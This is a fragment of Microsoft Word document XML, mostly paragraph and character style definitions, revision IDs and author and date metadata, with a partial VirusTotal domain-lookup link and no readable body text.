  <w:num w:numId="29" w16cid:durableId="1270968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20"/>
    <w:rsid w:val="001E1C20"/>
    <w:rsid w:val="003378BF"/>
    <w:rsid w:val="005E4570"/>
    <w:rsid w:val="00952FF9"/>
    <w:rsid w:val="00973837"/>
    <w:rsid w:val="00ED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B0DA4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9579F515-4818-9C41-9342-E0090DB61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1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1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1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C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C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C20"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="body-md-regular">
    <w:name w:val="body-md-regular"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001E1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1C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1C20"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="connect-sr-only">
    <w:name w:val="connect-sr-only"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001E1C20"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001E1C2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C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C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body-sm-medium">
    <w:name w:val="body-sm-medium"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001E1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1E1C20"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="001E1C20"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001E1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73837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73837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73837"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="480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73837"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0"/>
    </w:pPr>
    <w:rPr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7383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7383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7383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7383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7383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73837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rustotal.com/gui/domain/sea-fire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D0B392-5FB1-8142-8321-6E49E8E82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2711</Words>
  <Characters>15455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Horváth</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jakub Horváth</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-18T13:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T13:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>